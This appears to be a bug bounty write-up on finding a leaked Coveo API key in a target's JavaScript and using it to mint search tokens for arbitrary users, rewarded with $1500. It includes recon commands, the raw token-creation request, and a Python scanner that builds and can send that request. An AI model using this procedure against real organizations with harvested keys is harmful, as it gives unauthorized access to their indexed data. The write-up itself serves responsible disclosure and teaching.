Coveo Access Token Leak in JavaScript File Leading to API Token Creation for $1500
We were doing recon on a Bugcrowd public program, looking for information disclosure in JavaScript files. We enumerated subdomains with several tools, including brute-forcing, and then fed the results to Wayback and gau to pull out JS URLs.
Here is our recon workflow for finding information disclosure in JS files:
- Grepped all URLs for the targets out of Wayback URLs and gau.
- Collected every URL ending in .js.
- Confirmed they were really JavaScript by checking the response content type: httpx -content-type | grep 'application/javascript'
- Ran the Nuclei exposure templates over them: nuclei -t /root/nuclei-templates/exposures/
https://x.com/sushantdhopat/status/1608708353013977089
With this recon we discovered a token, but initially we didn't know what it was or how to use it.
The same JavaScript file also contained the URL https://platform.cloud.coveo.com/rest/search. After researching this URL and digging further, we confirmed that the token was a Coveo access token. Coveo distinguishes long-lived API keys from short-lived search tokens that are minted for a specific user, and this token could be used to generate API tokens or search tokens. A search token embedded in a public search page is expected; a key that can mint search tokens for arbitrary users is not, because anyone holding it can query the organization's index as any user.
By reading the documentation thoroughly, we identified the following request to create a search token for a particular user:
POST /rest/search/v2/token?organizationid=test HTTP/2
Host: platform.cloud.coveo.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/json
Accept: application/json
Authorization: Bearer xxfewrfe435-5454-54545-5454-354534545
Content-Length: 144
{
"userIds": [
{
"name": "asmith@example.com",
"provider": "Email Security Provider",
"type": "User"
}
]
}
We replaced the placeholder in the Authorization: Bearer header of the above request with the disclosed access token and used our target's organization ID. With this modified request we were able to create a search token for the user named in userIds, which confirmed that the leaked key was live and privileged.
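The following script is an added example for this write-up, not the program's code or Coveo's. It ties the two steps together: it scans a JavaScript file for the Coveo search endpoint, organization IDs and credential-looking strings (classifying "xx"+UUID values as API keys and JWTs as search tokens, both of which are shape heuristics I am assuming), and then prepares, without sending, the search-token request shown above. The sample JS, the organization ID acmecorp and the key value are constructed; the query parameter is written organizationId as in Coveo's own URLs, where the write-up uses the lowercase form.

```python
import json
import re
from urllib.parse import urlencode

# Endpoints named in the write-up; host and token path are Coveo's.
COVEO_SEARCH_URL = "https://platform.cloud.coveo.com/rest/search"
TOKEN_ENDPOINT = COVEO_SEARCH_URL + "/v2/token"

# Constructed sample of a JS bundle (not from the real program): a Coveo JS UI
# init call with a hard-coded key, plus a search token (a JWT) for contrast.
SAMPLE_JS = r"""
(function () {
  var ep = "https://platform.cloud.coveo.com/rest/search/v2?organizationId=acmecorp";
  Coveo.SearchEndpoint.configureCloudV2Endpoint("acmecorp", "xx3f2a9c1e-7b44-4d0a-9f61-2c8e5b7a1d90");
  window.searchToken = "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VySWRzIjpbXX0.c2lnbmF0dXJl";
})();
"""

# Shape heuristics (assumptions): Coveo API keys look like "xx" + UUID,
# search tokens are JWTs. Neither regex proves what a value is; triage follows.
API_KEY_RE = re.compile(
    r"\bxx[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b", re.I)
JWT_RE = re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\b")
ORG_RE = re.compile(
    r"organizationId=([A-Za-z0-9_-]+)"
    r"|configureCloudV2Endpoint\(\s*[\"']([A-Za-z0-9_-]+)[\"']")


def _dedupe(items):
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def classify_token(token):
    """'api-key' is the finding; a 'search-token' in a public page is expected."""
    if API_KEY_RE.fullmatch(token):
        return "api-key"
    if JWT_RE.fullmatch(token):
        return "search-token"
    return "unknown"


def find_coveo_leaks(js):
    """Return organization IDs and credential candidates from JS source.
    Files that never mention the Coveo platform host are skipped outright."""
    if "platform.cloud.coveo.com" not in js:
        return {"org_ids": [], "tokens": []}
    org_ids = _dedupe(g1 or g2 for g1, g2 in ORG_RE.findall(js))
    tokens = [{"value": t, "kind": classify_token(t)}
              for t in _dedupe(API_KEY_RE.findall(js) + JWT_RE.findall(js))]
    return {"org_ids": org_ids, "tokens": tokens}


def build_search_token_request(api_key, org_id, user_email,
                               provider="Email Security Provider"):
    """Prepare (but do not send) the POST from the write-up, so the
    proof-of-concept can be reviewed before it touches the target."""
    body = json.dumps({"userIds": [{"name": user_email,
                                    "provider": provider,
                                    "type": "User"}]})
    return {
        "method": "POST",
        "url": TOKEN_ENDPOINT + "?" + urlencode({"organizationId": org_id}),
        "headers": {
            "Authorization": "Bearer " + api_key,
            "Content-Type": "application/json",
            "Accept": "application/json",
            "Content-Length": str(len(body.encode())),
        },
        "body": body,
    }


def send(req):
    """Send a prepared request with the standard library. Only run this
    against a program that has authorized the test."""
    import urllib.request
    r = urllib.request.Request(req["url"], data=req["body"].encode(),
                               method=req["method"], headers=req["headers"])
    with urllib.request.urlopen(r, timeout=15) as resp:
        return resp.status, json.loads(resp.read() or b"{}")


if __name__ == "__main__":
    leaks = find_coveo_leaks(SAMPLE_JS)
    for t in leaks["tokens"]:
        print(t["kind"], t["value"])
    keys = [t["value"] for t in leaks["tokens"] if t["kind"] == "api-key"]
    if keys and leaks["org_ids"]:
        req = build_search_token_request(keys[0], leaks["org_ids"][0],
                                         "asmith@example.com")
        print(req["method"], req["url"])
        print(req["body"])
```

Run it over the JS files collected in the recon step and only a file whose tokens come back as "api-key" deserves a manual look; a JWT search token alone is how Coveo's public search UI is meant to work. The prepared request is inert by design, so the organization ID and user can be checked before anything is sent.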
We reported this finding to the program, and it was acknowledged and rewarded with $1500.
Hope you enjoyed reading about this! If you have any queries or questions, feel free to comment below or reach out to us directly.